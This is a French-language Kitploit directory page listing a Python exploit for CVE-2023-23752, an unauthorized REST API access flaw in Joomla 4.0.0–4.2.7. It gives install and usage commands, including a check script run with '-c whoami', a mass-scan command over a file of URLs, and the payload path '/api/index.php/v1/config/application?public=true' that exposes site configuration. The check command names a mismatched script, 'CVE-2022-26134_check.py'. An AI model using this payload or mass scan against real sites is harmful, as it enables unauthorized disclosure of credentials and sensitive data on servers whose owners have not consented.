Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-23752 — Exploit basé sur Python pour CVE-2023-23752 ciblant Joomla 4.0.0-4.2.7, accès non autorisé à l'API REST, permettant la divulgation d'informations sensibles via des payloads conçus. | Kitploit
Outils/GitHubGitHub/ytxzx/cve-2023-23752
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubytxzx/cve-2023-23752

CVE-2023-23752

Exploit basé sur Python pour CVE-2023-23752 ciblant Joomla 4.0.0-4.2.7, accès non autorisé à l'API REST, permettant la divulgation d'informations sensibles via des payloads conçus.

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-23752 - Recurrence of Joomla Unauthorized Access Vulnerability

Utilisation du script

Installer la bibliothèque Python

pip install -r requirements.txt

Vérification de la vulnérabilité

python3 CVE-2022-26134_check.py -u url -c whoami

image

Scan de masse

python3 CVE-2023-23752.py -f url_part.txt

image

Versions affectées

4.0.0 <= Joomla <= 4.2.7

Reproduction de la vulnérabilité

payload:

/api/index.php/v1/config/application?public=true

Accédez à l'URL vulnérable, capturez le paquet, rejouez le paquet.

image

Principe de la vulnérabilité

Joomla! CMS versions 4.0.0 à 4.2.7, en raison d'un contrôle d'accès inadéquat aux points d'accès du service web, peut entraîner un accès non autorisé à l'API REST, provoquant une fuite d'informations sensibles.

Télécharger l’outil